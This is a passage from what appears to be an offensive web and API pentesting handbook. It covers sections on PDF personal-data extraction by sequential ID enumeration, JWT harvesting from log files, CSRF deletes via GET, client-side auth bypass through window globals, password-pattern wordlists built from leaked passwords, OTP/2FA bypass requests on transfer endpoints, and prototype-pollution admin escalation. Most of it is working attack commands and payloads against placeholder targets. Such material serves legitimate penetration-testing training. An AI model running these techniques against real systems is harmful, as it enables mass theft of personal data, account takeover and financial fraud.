&lt;/ul&gt;
&lt;h3 id="265-pdf-pii-extraction-pipeline" &gt;
&lt;div&gt;
&lt;a href="#265-pdf-pii-extraction-pipeline"&gt;
##
&lt;/a&gt;
26.5 PDF PII Extraction Pipeline
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;When APIs return PDFs in base64:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Fetch the PDF as base64&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:8085/get-doc.php&amp;#34;&lt;/span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#34;doc_id=148601&amp;#34;&lt;/span&gt; &amp;gt; response.json
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Decode and extract text&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jq -r &lt;span style="color:#a6d189"&gt;&amp;#39;.data&amp;#39;&lt;/span&gt; response.json | base64 -d &amp;gt; documento.pdf
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pdftotext documento.pdf - | grep -E &lt;span style="color:#a6d189"&gt;&amp;#34;CPF|CNPJ|RG|CEP|telefone&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Enumerate sequential IDs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; id in &lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;seq &lt;span style="color:#ef9f76"&gt;148000&lt;/span&gt; 148700&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:8085/get-doc.php&amp;#34;&lt;/span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#34;doc_id=&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$id&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; | &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; jq -r &lt;span style="color:#a6d189"&gt;&amp;#39;.data&amp;#39;&lt;/span&gt; | base64 -d | pdftotext - - | grep &lt;span style="color:#a6d189"&gt;&amp;#34;CPF&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34; → ID: &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$id&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="266-jwt-token-harvesting-via-log-files" &gt;
&lt;div&gt;
&lt;a href="#266-jwt-token-harvesting-via-log-files"&gt;
##
&lt;/a&gt;
26.6 JWT Token Harvesting via Log Files
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Log files often accumulate hundreds of JWT tokens:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Download log&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:8085/api-simple.log&amp;#34;&lt;/span&gt; &amp;gt; api.log
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract ALL JWTs (access + refresh tokens)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;eyJ[a-zA-Z0-9_\-]{20,}\.[a-zA-Z0-9_\-]{20,}\.[a-zA-Z0-9_\-]{10,}&amp;#39;&lt;/span&gt; api.log | wc -l
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# E.g.: 315 tokens in a single log file&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Decode each one&amp;#39;s payload (without verifying the signature)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;eyJ[a-zA-Z0-9_\-]{20,}\.[a-zA-Z0-9_\-]{20,}\.[a-zA-Z0-9_\-]{10,}&amp;#39;&lt;/span&gt; api.log | &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;while&lt;/span&gt; &lt;span style="color:#99d1db"&gt;read&lt;/span&gt; jwt; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;payload&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;&lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$jwt&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; | cut -d&lt;span style="color:#a6d189"&gt;&amp;#39;.&amp;#39;&lt;/span&gt; -f2 | base64 -d 2&amp;gt;/dev/null&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$payload&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; | jq -r &lt;span style="color:#a6d189"&gt;&amp;#39;.exp&amp;#39;&lt;/span&gt; 2&amp;gt;/dev/null &lt;span style="color:#737994;font-style:italic"&gt;# check expiration&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Filter for tokens still valid by their exp timestamp&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="267-delete-via-get--no-csrf-no-preflight" &gt;
&lt;div&gt;
&lt;a href="#267-delete-via-get--no-csrf-no-preflight"&gt;
##
&lt;/a&gt;
26.7 DELETE via GET — No CSRF, No Preflight
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;APIs that accept DELETE via GET method completely bypass CSRF protections:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Instead of:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# DELETE /api/clients/delete/123&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Use:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;GET https://TARGET.com/api/clients/deleteClient/123&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Works! No CSRF token, no CORS preflight, exploitable via &amp;lt;img&amp;gt; tag&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If this exists, the attack is trivial:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;lt;img src=&amp;#34;https://TARGET.com/api/clients/deleteClient/123&amp;#34;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Authenticated victim visits page → DELETE executed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Look for DELETE via GET in poorly implemented RESTful APIs — it&amp;rsquo;s more common than it seems.&lt;/p&gt;
&lt;h3 id="268-client-side-auth-bypass-via-window-globals" &gt;
&lt;div&gt;
&lt;a href="#268-client-side-auth-bypass-via-window-globals"&gt;
##
&lt;/a&gt;
26.8 Client-Side Auth Bypass via &lt;code&gt;window.*&lt;/code&gt; Globals
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;React/Angular/Vue SPAs that expose auth functions in global scope:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// In the victim&amp;#39;s browser console (or via XSS):
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;window&lt;/span&gt;.affiliateRegistered(&lt;span style="color:#a6d189"&gt;&amp;#39;forged-token-here&amp;#39;&lt;/span&gt;) &lt;span style="color:#737994;font-style:italic"&gt;// Sets the auth token
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;window&lt;/span&gt;.loginSuccessful(&lt;span style="color:#a6d189"&gt;&amp;#39;user-data&amp;#39;&lt;/span&gt;) &lt;span style="color:#737994;font-style:italic"&gt;// Completes the login flow
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;window&lt;/span&gt;.setToken(&lt;span style="color:#a6d189"&gt;&amp;#39;admin-jwt&amp;#39;&lt;/span&gt;) &lt;span style="color:#737994;font-style:italic"&gt;// Sets the admin JWT
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// → Dashboard now accessible with the forged token
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// → No server-side validation of the full login flow
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Detection&lt;/strong&gt;: Inspect the &lt;code&gt;window&lt;/code&gt; object in the browser console:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;Object&lt;/span&gt;.keys(&lt;span style="color:#99d1db"&gt;window&lt;/span&gt;).filter(k =&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; k.toLowerCase().includes(&lt;span style="color:#a6d189"&gt;&amp;#39;login&amp;#39;&lt;/span&gt;) &lt;span style="color:#99d1db;font-weight:bold"&gt;||&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; k.toLowerCase().includes(&lt;span style="color:#a6d189"&gt;&amp;#39;auth&amp;#39;&lt;/span&gt;) &lt;span style="color:#99d1db;font-weight:bold"&gt;||&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; k.toLowerCase().includes(&lt;span style="color:#a6d189"&gt;&amp;#39;token&amp;#39;&lt;/span&gt;) &lt;span style="color:#99d1db;font-weight:bold"&gt;||&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; k.toLowerCase().includes(&lt;span style="color:#a6d189"&gt;&amp;#39;register&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="269-password-pattern-recognition-for-wordlists" &gt;
&lt;div&gt;
&lt;a href="#269-password-pattern-recognition-for-wordlists"&gt;
##
&lt;/a&gt;
26.9 Password Pattern Recognition for Wordlists
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Analyze leaked passwords to identify reused patterns:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;re&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Passwords found in API responses&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;passwords &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a6d189"&gt;&amp;#34;Pratibha7231@&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;Ankit7231@&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;Sumit7231@&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;Manish7231@&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Identify pattern: [Name]7231@&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pattern &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;^[A-Z][a-z]+7231@$&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Generate a wordlist from pattern + list of employee names&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;employees &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a6d189"&gt;&amp;#34;Rahul&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;Priya&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;Vikram&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;Neha&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;Amit&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;wordlist &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;name&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;7231@&amp;#34;&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; name &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; employees]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Other common patterns:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - [Name][Year]@ → Maria2024@&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Admin@[Number] → Admin@123&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - [Company][Year] → target2024&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - password + variations → password, Password, password123, P@ssword&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2610-otp2fa-bypass--7-patterns" &gt;
&lt;div&gt;
&lt;a href="#2610-otp2fa-bypass--7-patterns"&gt;
##
&lt;/a&gt;
26.10 OTP/2FA Bypass — 7 Patterns
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;th&gt;How to test&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;OTP in response&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Check whether the OTP appears in the HTTP response body&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;OTP not invalidated&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Use the same code twice&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Null/empty OTP&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Send &lt;code&gt;otp=&lt;/code&gt; or omit the field&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;OTP over HTTP&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Check whether the endpoint accepts HTTP (sniffable)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Sequential OTP&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Try nearby codes (000001, 000002&amp;hellip;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Predictable OTP&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Check if based on timestamp or user ID&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;2FA not required&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Test sensitive endpoints (transfer, email-change) without OTP&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test OTP bypass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET.com/api/transfer&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Bearer &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$USER_TOKEN&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;to&amp;#34;:&amp;#34;dest&amp;#34;,&amp;#34;amount&amp;#34;:100,&amp;#34;otp&amp;#34;:&amp;#34;&amp;#34;}&amp;#39;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# empty OTP&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET.com/api/transfer&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Bearer &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$USER_TOKEN&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;to&amp;#34;:&amp;#34;dest&amp;#34;,&amp;#34;amount&amp;#34;:100}&amp;#39;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# no OTP field&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Reuse OTP&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET.com/api/transfer&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;to&amp;#34;:&amp;#34;dest2&amp;#34;,&amp;#34;amount&amp;#34;:50,&amp;#34;otp&amp;#34;:&amp;#34;USED_CODE&amp;#34;}&amp;#39;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# same OTP already used&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2611-prototype-pollution--detection-and-exploit" &gt;
&lt;div&gt;
&lt;a href="#2611-prototype-pollution--detection-and-exploit"&gt;
##
&lt;/a&gt;
26.11 Prototype Pollution — Detection and Exploit
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// 1. Test injection via JSON merge
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;POST &lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;api&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;profile
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#34;__proto__&amp;#34;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;isAdmin&amp;#34;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;true&lt;/span&gt;}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// or
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#34;constructor&amp;#34;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;prototype&amp;#34;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;isAdmin&amp;#34;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;true&lt;/span&gt;}}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// 2. Check whether the pollution affects authorization
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;GET &lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;api&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;admin&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;dashboard
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// If 200 with the polluted header → prototype pollution confirmed
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
